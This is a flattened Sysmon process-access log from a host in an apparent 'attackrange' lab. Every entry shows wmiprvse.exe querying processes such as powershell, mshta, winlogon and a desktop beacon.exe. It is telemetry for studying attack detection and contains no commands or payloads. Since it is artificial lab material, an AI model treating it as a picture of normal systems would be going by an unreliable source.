22:55:40.172{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7957-6039-1D10-00000000AD01}2836C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697285Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.171{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697284Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.170{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697283Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.169{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697282Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.169{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697281Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.168{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697280Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.167{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697279Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.167{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697278Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.166{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697277Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.165{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697276Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.165{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697275Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.164{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697274Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.163{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697273Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.162{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697272Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.146{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697271Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.146{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697270Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.146{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697269Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.146{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697268Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.146{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697267Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.146{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697266Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 